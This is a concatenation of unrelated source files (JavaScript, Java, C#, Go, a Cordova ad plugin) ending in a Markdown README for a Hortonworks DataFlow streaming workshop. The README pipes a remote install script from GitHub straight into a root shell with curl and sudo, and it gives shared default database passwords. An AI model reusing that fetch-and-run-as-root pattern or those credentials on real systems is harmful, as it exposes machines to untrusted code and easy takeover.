}
};
Clicked.prototype.mousedown = function (e) {
if (this.checkMouseButtons(e)) {
if (this.down === true) {
this.down = false;
}
else {
this.handleDown(e, e.screenX, e.screenY);
}
}
};
Clicked.prototype.mousemove = function (e) {
if (this.down) {
var x = e.screenX;
var y = e.screenY;
if (this.pastThreshold(x, y)) {
this.cancel();
}
}
};
Clicked.prototype.mouseup = function (e) {
if (this.down) {
e.preventDefault();
this.handleClicks(e);
}
};
Clicked.prototype.setTimeout = function (callback, time) {
return setTimeout(callback, time);
};
return Clicked;
}());
export { Clicked };
/**
 * Callback for Clicked events
* @callback Clicked~ClickedCallback
* @param {UIEvent} event
* @param {('clicked'|'double-clicked'|'long-clicked'|'click-down')} type
*/
|
Java
|
UTF-8
| 1,147 | 2.625 | 3 |
[] |
no_license
|
package com.example.asuper.gesturerecognizer.sensor;
import org.junit.Test;
import static org.hamcrest.CoreMatchers.*;
import static org.junit.Assert.*;
public class SensorDataRegulatorTest {
@Test
public void correctAverageData() {
SensorDataRegulator regulator = new SensorDataRegulator();
regulator.pushData(new float[]{1, 1, 1});
regulator.pushData(new float[]{1, 1, 1});
regulator.pushData(new float[]{1, 1, 1});
float[] data = regulator.getAverageData();
assertThat(data, equalTo(new float[]{1, 1, 1}));
}
@Test
public void listCleaningNeeded() {
SensorDataRegulator regulator = new SensorDataRegulator();
regulator.pushData(new float[]{1, 1, 1});
regulator.pushData(new float[]{1, 1, 1});
regulator.pushData(new float[]{1, 1, 1});
regulator.getAverageData();
regulator.pushData(new float[]{2, 1, 1});
regulator.pushData(new float[]{2, 1, 1});
regulator.pushData(new float[]{2, 1, 1});
float[] data = regulator.getAverageData();
assertThat(data, equalTo(new float[]{2, 1, 1}));
}
}
|
Java
|
UTF-8
| 497 | 2.21875 | 2 |
[] |
no_license
|
package cn.mobiledaily.domain;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
public final class Converter {
private static final ObjectMapper MAPPER = new ObjectMapper();
public static String toJson(Object object) {
try {
return MAPPER.writeValueAsString(object);
} catch (JsonProcessingException e) {
            throw new IllegalStateException("cannot convert to json.", e);
}
}
}
|
JavaScript
|
UTF-8
| 1,907 | 2.953125 | 3 |
[] |
no_license
|
"use strict";
module.exports = {
guid: function() {
return Math.floor( ( 1 + Math.random() ) * 0x10000 ).toString( 16 );
},
clone: function( obj ){
var clone = {};
if( obj === null || typeof( obj ) !== "object" ){
return obj;
}
for( var i in obj ){
if( obj.hasOwnProperty( i ) && typeof( obj[i] ) === "object" && obj[i] !== null ){
clone[i] = this.clone( obj[i] );
}
else {
clone[i] = obj[i];
}
}
return clone;
},
uniqueElementById: function( arrayUnique, arrayToAdd ){
for( var i = 0; i < arrayToAdd.length; i++ ){
var item = arrayToAdd[i];
var isNew = false;
if( arrayUnique.length === 0 ){
arrayUnique.push( item );
}
else {
isNew = true;
for( var j = 0; j < arrayUnique.length; j++ ){
var uniqueItem = arrayUnique[j];
if( uniqueItem.id === item.id ){
isNew = false;
}
}
}
if( isNew ){
arrayUnique.push(item);
}
}
return arrayUnique;
},
dateToString : function( date ){
var dayOfMonth = (date.getDate() < 10) ? "0" + date.getDate() : date.getDate() ;
        var month = date.getMonth() + 1; // getMonth() is zero-based, so add 1 to get the calendar month
        month = (month < 10) ? "0" + month : month;
var curHour = date.getHours() < 10 ? "0" + date.getHours() : date.getHours();
var curMinute = date.getMinutes() < 10 ? "0" + date.getMinutes() : date.getMinutes();
var curSeconds = date.getSeconds() < 10 ? "0" + date.getSeconds() : date.getSeconds();
return curHour + "h:" + curMinute + "m:" + curSeconds + "s " + dayOfMonth + "/" + month;
}
};
|
C#
|
UTF-8
| 2,879 | 2.546875 | 3 |
[] |
no_license
|
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using UJEP_WinformPainting.Classes.ColorCon;
using UJEP_WinformPainting.Classes.Managers.LivePreview;
using UJEP_WinformPainting.Classes.Managers.Memory;
using UJEP_WinformPainting.Classes.PaitingObjects;
using UJEP_WinformPainting.Classes.Tools;
namespace UJEP_WinformPainting.Classes.Managers.Main
{
public class MainManager : ILivePreview
{
public readonly IPaintingMemoryManager MemoryManager;
public Tool SelectedTool { get; set; }
public PaintingObject SelectedObject { get; set; }
public ColorContainer SelecedColorContainer { get; private set; }
public MainManager(IPaintingMemoryManager memoryManager)
{
this.MemoryManager = memoryManager;
this.SelectedTool = Tool.Default;
this.SelecedColorContainer = ColorContainer.Default;
}
public void UpdatePreview(Point currentMousePosition, PaintingObject paintingObject)
{
if (paintingObject != null)
paintingObject.Update(currentMousePosition);
}
        public void UpdatePosition(Point currentPosition, Point previousPosition, PaintingObject paintingObject)
        {
            var move = new Point(currentPosition.X - previousPosition.X, currentPosition.Y - previousPosition.Y);
paintingObject.UpdatePosition(move);
}
public bool IsMovingObject()
{
return SelectedObject != null && !SelectedObject.IsBeingCreated;
}
public void BeginPreview(PaintingObject paintingObject)
{
MemoryManager.Add(paintingObject);
SelectedObject = paintingObject;
}
public void EndPreview()
{
SelectedObject.IsBeingCreated = false;
SelectedObject = null;
}
public void BeginPreview(Point mousePosition)
{
if (IsGrabTool()) SetSelectedObject(mousePosition);
else
BeginDrawing(mousePosition);
}
private void SetSelectedObject(Point mousePosition)
{
SelectedObject = MemoryManager.GetObjectOnPosition(mousePosition);
}
private void BeginDrawing(Point mousePosition)
{
var paintingObject = SelectedTool.PaintingObject.GetInstance(mousePosition, SelecedColorContainer);
BeginPreview(paintingObject);
}
private bool IsGrabTool()
{
return SelectedTool is GrabTool;
}
public void SetSelectedColor(Color color)
{
            // for a different stroke width, it is enough to adjust the pen size
SelecedColorContainer = new ColorContainer(new SolidBrush(color), new Pen(color), color);
}
}
}
|
Go
|
UTF-8
| 1,169 | 2.515625 | 3 |
[
"MIT"
] |
permissive
|
// See swaybar-protocol(7).
package swaybar
// Header represents a swaybar-protocol header.
type Header struct {
Version int
ClickEvents bool
ContSignal int
StopSignal int
}
// Body represents a swaybar-protocol body.
type Body struct {
StatusLines []StatusLine
}
// StatusLine is a slice of Blocks representing a complete swaybar statusline.
type StatusLine struct {
Blocks []Block
}
// Block represents a single item in a StatusLine.
type Block struct {
FullText string
ShortText string
Color string
Background string
Border string
BorderTop int
BorderBottom int
BorderLeft int
BorderRight int
MinWidth int
Align string
Name string
Instance string
Urgent bool
Separator bool
SeparatorBlockWidth int
Markup string
}
// ClickEvent represents a swaybar-protocol click event.
type ClickEvent struct {
Name string
Instance string
X int
Y int
Button int
Event int
RelativeX int
RelativeY int
Width int
Height int
}
|
Java
|
UTF-8
| 611 | 2.796875 | 3 |
[] |
no_license
|
package com.github.peckb1.projecteuler.p011to020;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import java.time.LocalDate;
import java.time.Month;
public class Problem19Test {
private Problem19 problem19;
@Before
public void setUp() throws Exception {
this.problem19 = new Problem19();
}
@Test
public void testProblem19() throws Exception {
LocalDate start = LocalDate.of(1901, Month.JANUARY, 1);
LocalDate end = LocalDate.of(2001, Month.JANUARY, 1);
Assert.assertEquals(171, this.problem19.sundays(start, end));
}
}
|
Java
|
UTF-8
| 15,995 | 1.859375 | 2 |
[
"MIT"
] |
permissive
|
package cn.liangyongxiong.cordova.plugin.admob.tencent;
import android.app.Activity;
import android.app.FragmentManager;
import android.app.FragmentTransaction;
import android.text.TextUtils;
import android.view.ViewGroup;
import android.widget.RelativeLayout;
import android.util.Log;
import com.qq.e.ads.nativ.NativeAD;
import com.qq.e.ads.nativ.NativeADDataRef;
import com.qq.e.comm.util.AdError;
import org.apache.cordova.CallbackContext;
import org.apache.cordova.CordovaPlugin;
import org.apache.cordova.PluginResult;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.ArrayList;
import java.util.List;
public class TencentAdMob extends CordovaPlugin {
public static final String TAG = TencentAdMob.class.getSimpleName();
private RelativeLayout bottomView, contentView;
private static final int BOTTOM_VIEW_ID = 0x1;
private TencentAdMobBannerFragment bannerFragment;
private TencentAdMobInterstitialFragment interstitialFragment;
@Override
public boolean execute(String action, JSONArray args, final CallbackContext callbackContext) throws JSONException {
final Activity activity = this.cordova.getActivity();
if (action.equals("showBannerAd")) {
String content = args.getString(0);
JSONObject object = new JSONObject(content);
final String app = object.getString("app");
final String position = object.getString("position");
final int close = object.getInt("close");
final int interval = object.getInt("interval");
final String align = object.optString("align");
activity.runOnUiThread(new Runnable() {
public void run() {
bottomView = new RelativeLayout(activity);
RelativeLayout.LayoutParams params = new RelativeLayout.LayoutParams(
RelativeLayout.LayoutParams.MATCH_PARENT,
RelativeLayout.LayoutParams.WRAP_CONTENT
);
if (align.equalsIgnoreCase("top")) {
params.addRule(RelativeLayout.ALIGN_PARENT_TOP);
} else {
params.addRule(RelativeLayout.ALIGN_PARENT_BOTTOM);
}
params.addRule(RelativeLayout.CENTER_HORIZONTAL);
                    bottomView.setLayoutParams(params); // bottom container
bottomView.setId(BOTTOM_VIEW_ID);
contentView = new RelativeLayout(activity);
contentView.addView(bottomView);
activity.addContentView(contentView, new RelativeLayout.LayoutParams(
RelativeLayout.LayoutParams.MATCH_PARENT,
RelativeLayout.LayoutParams.MATCH_PARENT));
FragmentManager fm = activity.getFragmentManager();
FragmentTransaction ft = fm.beginTransaction();
bannerFragment = TencentAdMobBannerFragment.newInstance(app, position, close, interval);
bannerFragment.setCallbackContext(callbackContext);
ft.replace(BOTTOM_VIEW_ID, bannerFragment);
ft.commitAllowingStateLoss();
}
});
} else if (action.equals("hideBannerAd")) {
activity.runOnUiThread(new Runnable() {
@Override
public void run() {
if (bannerFragment != null) {
try {
JSONObject obj = new JSONObject();
obj.put("type", "onClose");
sendUpdate(bannerFragment.callbackContext, obj, false);
} catch (Exception e) {
}
FragmentManager fm = activity.getFragmentManager();
FragmentTransaction ft = fm.beginTransaction();
ft.remove(bannerFragment);
ft.commitAllowingStateLoss();
}
ViewGroup group = activity.findViewById(android.R.id.content);
if (group != null) {
group.removeView(contentView);
}
}
});
} else if (action.equals("showInterstitialAd")) {
String content = args.getString(0);
JSONObject object = new JSONObject(content);
final String app = object.getString("app");
final String position = object.getString("position");
final int popup = object.getInt("popup"); // 0:show | 1:showPopup
activity.runOnUiThread(new Runnable() {
@Override
public void run() {
FragmentManager fm = activity.getFragmentManager();
FragmentTransaction ft = fm.beginTransaction();
interstitialFragment = TencentAdMobInterstitialFragment.newInstance(app, position, popup);
interstitialFragment.setCallbackContext(callbackContext);
ft.add(interstitialFragment, TencentAdMobInterstitialFragment.class.getSimpleName());
ft.commitAllowingStateLoss();
}
});
} else if (action.equals("hideInterstitialAd")) {
            // close the interstitial ad
activity.runOnUiThread(new Runnable() {
@Override
public void run() {
FragmentManager fm = activity.getFragmentManager();
String tag = TencentAdMobInterstitialFragment.class.getSimpleName();
TencentAdMobInterstitialFragment fragment = (TencentAdMobInterstitialFragment) fm.findFragmentByTag(tag);
if (fragment != null) {
fragment.finishFragment();
}
}
});
} else if (action.equals("showSplashAd")) {
String content = args.getString(0);
JSONObject object = new JSONObject(content);
final String app = object.getString("app");
final String position = object.getString("position");
final int delay = object.getInt("delay");
JSONObject bottom = object.getJSONObject("bottom");
final String image = bottom.getString("image");
final int height = bottom.getInt("height");
activity.runOnUiThread(new Runnable() {
@Override
public void run() {
FragmentManager fm = activity.getFragmentManager();
FragmentTransaction ft = fm.beginTransaction();
TencentAdMobSplashFragment fragment = TencentAdMobSplashFragment.newInstance(app, position, delay, image, height);
fragment.setCallbackContext(callbackContext);
ft.add(fragment, TencentAdMobSplashFragment.class.getSimpleName());
ft.commitAllowingStateLoss();
}
});
} else if (action.equals("loadNativeAd")) {
String content = args.getString(0);
JSONObject object = new JSONObject(content);
final String app = object.getString("app");
final String position = object.getString("position");
final int count = object.getInt("count");
try {
activity.runOnUiThread(new Runnable() {
NativeAD nativeAD;
@Override
public void run() {
loadAD(count);
}
                    // initialize the native AD object and load ads
public void loadAD(int count) {
if (nativeAD == null) {
this.nativeAD = new NativeAD(activity,
app, position,
new NativeAD.NativeAdListener() {
@Override
public void onADLoaded(List<NativeADDataRef> list) {
int size = list.size();
JSONArray array = new JSONArray();
try {
for (int i = 0; i < size; i++) {
JSONObject obj = new JSONObject();
NativeADDataRef nativeADDataRef = list.get(i);
String title = nativeADDataRef.getTitle();
String icon = nativeADDataRef.getIconUrl();
String img = nativeADDataRef.getImgUrl();
String desc = nativeADDataRef.getDesc();
ArrayList<String> imgs = (ArrayList<String>) nativeADDataRef.getImgList();
if (!TextUtils.isEmpty(title)) {
obj.put("title", title);
} else {
obj.put("title", "");
}
if (!TextUtils.isEmpty(icon)) {
obj.put("icon", icon);
} else {
obj.put("icon", "");
}
if (!TextUtils.isEmpty(img)) {
obj.put("img", img);
} else {
obj.put("img", "");
}
if (!TextUtils.isEmpty(desc)) {
obj.put("desc", desc);
} else {
obj.put("desc", "");
}
if (imgs != null && imgs.size() > 0) {
JSONArray arr = new JSONArray();
                                            for (int j = 0; j < imgs.size(); j++) {
arr.put(imgs.get(j));
}
obj.put("imgs", arr.toString());
} else {
obj.put("imgs", new JSONArray().toString());
}
String score = String.valueOf(nativeADDataRef.getAPPScore());
double p = (double) (nativeADDataRef.getAPPPrice());
String price = String.valueOf(p);
if (TextUtils.isEmpty(score) || !TextUtils.isDigitsOnly(score)) {
obj.put("score", 0);
} else {
obj.put("score", Integer.parseInt(score));
}
if (TextUtils.isEmpty(price)) {
obj.put("price", (double) 0);
} else {
if (Double.isInfinite(p) || Double.isNaN(p)) {
obj.put("price", (double) 0);
} else {
obj.put("price", p);
}
}
array.put(obj);
}
JSONObject adsJsonObject = new JSONObject();
adsJsonObject.put("ads", array);
adsJsonObject.put("type", "onSuccess");
sendUpdate(callbackContext, adsJsonObject, false);
} catch (Exception e) {
e.printStackTrace();
}
}
@Override
public void onNoAD(AdError error) {
try {
JSONObject obj = new JSONObject();
obj.put("type", "onError");
obj.put("code", error.getErrorCode());
obj.put("msg", error.getErrorMsg());
sendUpdate(callbackContext, obj, false);
} catch (Exception e) {
}
}
@Override
public void onADStatusChanged(NativeADDataRef nativeADDataRef) {
}
@Override
public void onADError(NativeADDataRef nativeADDataRef, AdError error) {
try {
JSONObject obj = new JSONObject();
obj.put("type", "onError");
obj.put("code", error.getErrorCode());
obj.put("msg", error.getErrorMsg());
sendUpdate(callbackContext, obj, false);
} catch (Exception e) {
}
}
});
}
nativeAD.loadAD(count);
}
});
} catch (Exception ex) {
callbackContext.error(0);
}
} else {
return false;
}
return true;
}
private void sendUpdate(CallbackContext callbackContext, JSONObject obj, boolean keepCallback) {
sendUpdate(callbackContext, obj, keepCallback, PluginResult.Status.OK);
}
private void sendUpdate(CallbackContext callbackContext, JSONObject obj, boolean keepCallback, PluginResult.Status status) {
PluginResult result = new PluginResult(status, obj);
result.setKeepCallback(keepCallback);
callbackContext.sendPluginResult(result);
}
}
|
JavaScript
|
UTF-8
| 848 | 3.78125 | 4 |
[] |
no_license
|
// link:https://leetcode.com/problems/rotated-digits/description/
/**
* @param {number} N
* @return {number}
*/
var rotatedDigits = function(N) {
let res = 0;
for (let i = 1; i <= N; ++i) {
if (isGood(i, false)) res++;
}
return res;
};
var isGood = (n, flag) => {
if (n == 0) return flag;
let d = Math.floor(n % 10);
if (d == 3 || d == 4 || d == 7) return false;
if (d == 0 || d == 1 || d == 8) return isGood(Math.floor(n / 10), flag);
return isGood(Math.floor(n / 10), true);
};
// use Set
var rotatedDigits = function(N) {
let res = 0;
for (let i = 1; i <= N; ++i) {
if (isGood(i)) res++;
}
return res;
};
var isGood = n => {
let d = new Set(n+'');
if (d.has('3') || d.has('4') || d.has('7')) return false;
if (!d.has('2') && !d.has('5') && !d.has('6') && !d.has('9')) return false;
return true;
};
|
Markdown
|
UTF-8
| 44,664 | 2.875 | 3 |
[] |
no_license
|
# Streaming-Workshop-with-HDF
# Contents
- [Introduction](#introduction) - Workshop Introduction
- [Use case](#use-case) - Building a 360 view for customers
- [Lab 1](#lab-1) - Cluster installation
- Create an HDF 3.2 cluster
- Access your cluster
- [Lab 2](#lab-2) - Simple flow management
- [Lab 3](#lab-3) - Platform preparation (admin persona)
- Create schemas in Schema Registry
- Create record readers and writters in NiFi
- Create process groups and variables in NiFi
- Create events topics in Kafka
- Create bucket in NiFi Registry
- [Lab 4](#lab-4) - MySQL CDC data ingestion (DataEng persona)
- Configure MySQL to enable binary logs
- Ingest and format data in NiFi
- Store events in ElasticSearch
- Publish update events in Kafka
- [Lab 5](#lab-5) - Version flow in NiFi Registry (DataEng persona)
- [Lab 6](#lab-6) - Logs data collection with MiNiFi(DataEng persona)
- Design MiNiFi pipeline
- Deploy MiNiFi agent
- Deploy MiNiFi pipeline
- Design NiFi pipeline
- [Lab 7](#lab-7) - TODO Fraud detection with Kafka Streams (Dev persona)
- [Lab 7](#lab-7) - TODO Realtime analytics with Kudu/Impala (Analyst persona)
---------------
# Introduction
The objective of this workshop is to build an end-to-end streaming use case with HDF. This includes edge collection, flow management and stream processing. A focus is also put on governance and best practices using tools such as Schema Registry, Flow Registry and Variable Registry. At the end of the workshop, you will understand why HDF is a complete streaming platform that offers enterprise features to build, test and deploy any advanced streaming application. In addition, you will learn details on some of the new features brought by the latest HDF versions:
- Use NiFi to ingest CDC data in real time
- Use Record processors to benefit from improved performance and integration with schema registry
- Route and filter data using SQL
- Version flow developments and propagation from dev to prod
- Integration between NiFi and Kafka to benefit from latest Kafka improvements (transactions, message headers, etc)
- Deploy and use MiNiFi agents
# Use case
In this workshop, we will build a simplified streaming use case for a retail company. We will ingest customer data from MySQL Database and web apps logs from web applications to build a 360 view of a customer in real-time. This data can be stored on modern datastores such as HBase, Kudu or ElasticSearch depending on the use case.
Based on these two data streams, we can implement a fraud detection algorithm in real time. For instance, if a user updates his account (ex postal address) and buys an item that's more expensive than its average purchase, we may decide to investigate. This can be a sign that his account has been hacked and used to buy an expensive item that will be shipped to a new address. The following picture explains the high level architecture of the use case.
For today's lab, we have only 2h30 so we will focus only on the platform and flow management parts. You can come back to this lab later to work on the edge collection, stream processing or analytics parts.

# Lab 1
## Create an HDF 3.2 cluster
For this workshop, we will use a one-node HDF cluster with NiFi, NiFi Registry, Kafka, Storm, Schema Registry and Stream Analytics Manager on AWS. These HDF clusters have been provisioned for you. Follow the instructions below to create your cluster:
- Connect to your AWS account and create a CentOs7 VM with at least 16 GB of RAM (ex: m4.xlarge instance). You can also use any other public or private cloud provider.
- Make sure to add at least 150GB of storage to the VM
- Add tags to your VM as per AWS expense policy : owner, business justification and end date(if applicable)
- Open ports required for the lab : 22 (SSH), 8080 (Ambari), 9090 (NiFi), 7788 (SR), 61080 (NiFi Registry), 3306 (MySQL), 9200 (Elastic)
- Make sure to create and download an SSH key
- Once your VM is ready, SSH to your cluster using your PEM key ``` ssh -i field.pem centos@ip ```
- Launch the cluster install using the following instruction
```
curl -sSL https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/scripts/install_hdf3-2_cluster.sh | sudo -E sh
```
This script installs a MySQL Database, ElasticSearch, MiNiFi, Ambari agent and server, the HDF MPack and the HDF services required for this workshop. Cluster installation will take about 10 minutes.
## Access your Cluster
- Login to Ambari Web UI by opening http://{YOUR_IP}:8080 and log in with **admin/StrongPassword**
- From Ambari, navigate to the different services, check that all services are running and healthy and try to access their UI from the right panel (NiFi, NiFi Registry & SR)
- Connect to the MySQL DB using bash or tools like MySQLWorkbench. A workshop DB has been created for the lab. You have also two users:
- **root/StrongPassword** usable from localhost only
- **workshop/StrongPassword** usable from remote and has full privileges on the workshop DB
# Lab 2 Simple flow management
Great! Now that you have your HDF cluster up and running and you are familiar with it, let's warm up with a simple NiFi exercise that will help us introduce basic NiFi notions. If you are already familiar with NiFi, you can skip this section and work on Lab 3 directly.
Let's create a simple NiFi flow that watches the /tmp/input directory and, each time a file is present, compresses it and moves it to /tmp/output. Go to the main canvas of NiFi, locate the add processor button, drag it onto the canvas and release. Explore the list of available processors. You can use the filter bar to search for a particular processor.

Add and configure the following processors:
1. Select the GetFile Processor and add it
1. Configure the GetFile Processor
1. Double-click on the new processor
1. The tabbed dialog should show settings, give the processor a name (ex. Get File From TMP)
1. Select the properties tab
1. Set Input Directory to "/tmp/input" (before doing this use "sudo su nifi" to become the nifi user, and make sure you create this directory on your NiFi box, and that it is owned by the nifi user - chown -R nifi:nifi /tmp/input)
1. Now add an UpdateAttribute processor
1. Configure it with a new dynamic property
1. In the properties tab, press the plus sign in the top right of the dialog
1. Call the property "filename" and set the value to something meaningful
1. Add a property called "mime.type" and set this to "application/gzip"
1. Connect the two processors
1. Hover over the GetFile processor, until the begin connection icon appears
1. Drag this onto the UpdateAttribute processor
1. This brings up the connection configuration dialog
1. For now just leave this on defaults.
1. Add a CompressContent processor and look at its properties, the defaults should work fine here.
1. On settings, make sure you set "Auto-terminate relationships" on for failure
1. Now connect up the output of our UpdateAttributes processor to the new CompressContent
1. Add a PutFile processor
1. Configure the Directory in the PutFile processor properties (nifi will create this directory for you). Note the conflict resolution strategy, and set it to replace.
1. Set both success and failure relationships to auto-terminate in the settings tab
1. Setup the connection between the CompressContent processor and the PutFile processor (only for the success relation!)
Now that you have your first flow completed, select the GetFile processor and press Play in the left panel. If you copy a file (for example /var/log/ambari-agent/ambari-agent.log) to the input folder you chose, NiFi will pick it up and send it to the next processor. You can see that there's one flow file in the queue.
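For example, assuming you kept the /tmp/input and /tmp/output directories used above, you can feed the flow and check the result from a shell on the NiFi node:
```
sudo cp /var/log/ambari-agent/ambari-agent.log /tmp/input/
# once the whole flow is running, the compressed file should show up here
ls -l /tmp/output
```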

To inspect the content of the queue, right click on the queue, select List queue, then click on the small "i" at the left of the first row. You can see all the details of this flow file: its content if you click on the "view" button, and its attributes if you move to the attributes tab. A flow file is always content plus a list of attributes.

Now start the next processor (UpdateAttribute), and inspect the attributes of the flow file in the next queue. You should see new attributes added by the processor.
Next, start the remaining processors and the flow file will be processed by them. Notice the statistics of the CompressContent processor as shown below. The size of the input data is bigger than the output data, which shows that our processor is really compressing files. Now check that "/tmp/output" contains your compressed file.

Congratulations!! You are now a NiFi flow designer :) Note that it's possible to select all the processors (e.g. with Ctrl-A) and start them in a batch. By doing this, your file will be quickly ingested, compressed and stored in the new location. We did it step by step only to show how NiFi works in slow motion. Test your flow again by copying a new file into /tmp/input. You should see the number of IN and OUT files move to 2 in all the processors.

Adding processors to the root canvas is not a best practice: things will get messy very quickly. To organise things, NiFi has an object called a process group (PG). PGs can be used to logically organize your NiFi environment, set up ACLs, reuse code, etc. Process Groups can be created beforehand and processors added to them directly. Since we have already added several processors, we can select them (Ctrl-A), right click on one of them, select 'Group', add a name and click on Add. Et voilà! We are now ready to tackle advanced topics.
# Lab 3 Platform preparation (admin persona)
To enforce best practices and governance, there are a few tasks that an admin should do before granting access to the platform. These tasks include:
- Define users, roles and privileges on each tool (SAM, NiFi, Etc)
- Define the schemas of events that we will use. This avoids having developers use their own schemas, which makes application integration and evolution a real nightmare.
- Define and enforce naming conventions that make it easier to manage application lifecycles (eg. NiFi PG and processor names)
- Define global variables that should be used to make application migration between environments simple
- etc
In this lab, we will implement some of these best practices to set the right environment for our developers.
## Create schemas in Schema Registry
In this workshop, we will manipulate three types of events. Go to Schema Registry from Ambari and create the following schemas as shown below:

### Customer events
These events are data coming from the MySQL DB through the CDC layer. Each event has different fields describing the customer (id, first name, last name, etc). To declare this schema, go to Schema Registry and add a new schema with these details:
- Name: customers
- Description: schema for CDC events
- Type: Avro Schema Provider
- Schema Group: Kafka
- Compatibility: both
- Evolve: true
For the schema text, use the following Avro description, also available [here](https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/schemas/customers.asvc)
```
{
"type": "record",
"name": "customers",
"fields" : [
{"name": "id", "type": "int"},
{"name": "first_name", "type": ["null", "string"]},
{"name": "last_name", "type": ["null", "string"]},
{"name": "gender", "type": ["null", "string"]},
{"name": "phone", "type": ["null", "string"]},
{"name": "email", "type": ["null", "string"]},
{"name": "countrycode", "type": ["null", "string"]},
{"name": "country", "type": ["null", "string"]},
{"name": "city", "type": ["null", "string"]},
{"name": "state", "type": ["null", "string"]},
{"name": "address", "type": ["null", "string"]},
{"name": "zipcode", "type": ["null", "string"]},
{"name": "ssn", "type": ["null", "string"]},
{"name": "timezone", "type": ["null", "string"]},
{"name": "currency", "type": ["null", "string"]},
{"name": "averagebasket", "type": ["null", "int"]}
]
}
```
### Logs events
These events are data coming from web applications through the MiNiFi agents deployed on application servers. Each event describes a customer's browsing behavior on a web page. The provided information is the customer id, the product page being viewed, the session duration and whether the customer bought the product at the end of the session. Go to Schema Registry and add a new schema with these details:
- Name: logs
- Description: schema for logs events
- Type: Avro Schema Provider
- Schema Group: Kafka
- Compatibility: both
- Evolve: true
For the schema text, use the following Avro description, also available [here](https://raw.githubusercontent.com/ahadjidj/Streaming-Workshop-with-HDF/master/schemas/logs.asvc)
```
{
"type": "record",
"name": "logs",
"fields" : [
{"name": "id", "type": "int"},
{"name": "product", "type": ["null", "string"]},
{"name": "sessionduration", "type": ["null", "int"]},
{"name": "buy", "type": ["null", "boolean"]},
{"name": "price", "type": ["null", "int"]}
]
}
```
### Logs_view events
We also need another logs event (logs_view) that contains only the product browsing session information, without the buy and price fields. We will see why later in the labs. Go to Schema Registry and add a new schema with these details:
- Name: logs_view
- Description: schema for logs_view events
- Type: Avro Schema Provider
- Schema Group: Kafka
- Compatibility: both
- Evolve: true
For the schema text, use the following Avro description:
```
{
"type": "record",
"name": "logs_view",
"fields" : [
{"name": "id", "type": "int"},
{"name": "product", "type": ["null", "string"]},
{"name": "sessionduration", "type": ["null", "int"]}
]
}
```
## Create record readers and writers in NiFi
To use these schemas in NiFi, we will leverage record-based processors. These processors use record readers and writers to offer improved performance and to use schemas defined globally in a Schema Registry. Our sources (MySQL CDC events and web app logs) generate data in JSON format, so we will need a JSON reader to deserialise the data. We will store this data in ElasticSearch and publish it to Kafka. Hence, we need JSON and Avro writers to serialize the data.
To add a reader/writer accessible by all our NiFi flows, click on Configure in the left panel, then Controller services, and click on the "+" button. Note that you can add a reader/writer inside a particular process group to isolate it. Readers/writers created inside a process group will be visible only to processors inside this PG.

### Add a HortonworksSchemaRegistry
Before adding any record reader/writer, we need to add a Schema Registry to tell NiFi where to look for schema definitions. NiFi supports several Schema Registries (Hortonworks, Confluent, NiFi schema registry). Hortonworks Schema registry is a cross tool registry that's integrated with NiFi, Kafka and SAM. Add a HortonworksSchemaRegistry controller to NiFi and configure it with your SR URL as shown below. Once created, make sure to start it by clicking on the lightning icon.
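If the screenshots below are hard to read, the only setting that really matters is the registry URL; on the single-node cluster used in this workshop it would look roughly like this (7788 is the Schema Registry port opened in Lab 1, and the /api/v1 suffix is an assumption about the default REST path):
```
Schema Registry URL : http://YOUR-CLUSTER-IP:7788/api/v1
```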


### Add JsonTreeReader
To deserialize JSON data, add a JsonTreeReader and configure it as shown below. Note that the **Schema Access Strategy** is set to **Use 'Schema Name' Property**. This means that flow files going through this reader must have an attribute **schema.name** that specifies the name of the schema that should be used. Start the Reader by clicking on the lightning icon.
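As a rough sketch of what the screenshot below shows, the reader boils down to three properties (the registry entry is the controller service added above):
```
Schema Access Strategy : Use 'Schema Name' Property
Schema Registry        : HortonworksSchemaRegistry
Schema Name            : ${schema.name}
```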

### Add JsonRecordSetWriter
To serialize JSON data for which we have a defined schema, add a JsonRecordSetWriter and configure it as shown below. Start the Writer by clicking on the lightning icon.

### Add AvroRecordSetWriter
Events collected by NiFi will be published to Kafka for further consumption. To prepare data for streaming engine consumption, we need to add an AvroRecordSetWriter and set **Schema Write Strategy** to **HWX Content-Encoded Schema Reference** as shown below. Start the Writer by clicking on the lightning icon.

## Create process groups and variables in NiFi
It's critical to organize your flows when you have a shared NiFi instance. NiFi flows can be organized per data source, where each Process Group defines the processing that should be applied to data coming from this source. If you have several flow developers working on different projects, you can assign roles and privileges to each of them on those process groups. The PG organisation is also useful to declare variables for each source or project and to make flow migration from one environment to another easier.
Add 3 PGs as shown below. Note the naming convention (sourceID_description). It is highly recommended to use a naming convention and to leverage it for flow migration and monitoring.


To add variable to a process group, right click on the process group and then variables.
- SRC1_CDCIngestion: ingest data from MySQL. This PG will use the below variables. For instance, we can change the variable elastic.url from localhost to the production Elastic cluster URL in a central location instead of updating it in every Elastic processor.
```
mysql.driver.location : /usr/share/java/mysql-connector-java.jar
mysql.username : root
mysql.serverid : 123
mysql.host : localhost:3306
source.schema : customers
elastic.url : http://localhost:9200
kafka.url : USE-YOUR-INTERNAL-CLUSTER-ADDRESS:6667 # You can get this address from Ambari config or from the Google Spreadsheet
```

- SRC2_LogsIngestion: ingest data from Web applications. This PG will use the following variables:
```
source.schema : logs
elastic.url : http://localhost:9200
kafka.url : USE-YOUR-INTERNAL-CLUSTER-ADDRESS:6667
```
- Agent1_LogsIngestion: the template that will be deployed in each MiNiFi agent for log ingestion. This PG doesn't use any variables.
## Create events topics in Kafka
As an admin, we need to provision Kafka topics and define their access policies. Use the following instructions to create the topics that we will use. In the future, topic provisioning will be possible through SMM.
```
/usr/hdf/current/kafka-broker/bin/kafka-topics.sh --zookeeper localhost:2181 --create --topic customers --partitions 1 --replication-factor 1
/usr/hdf/current/kafka-broker/bin/kafka-topics.sh --zookeeper localhost:2181 --create --topic logs --partitions 1 --replication-factor 1
/usr/hdf/current/kafka-broker/bin/kafka-topics.sh --zookeeper localhost:2181 --create --topic alerts --partitions 1 --replication-factor 1
```
## Create bucket in NiFi Registry
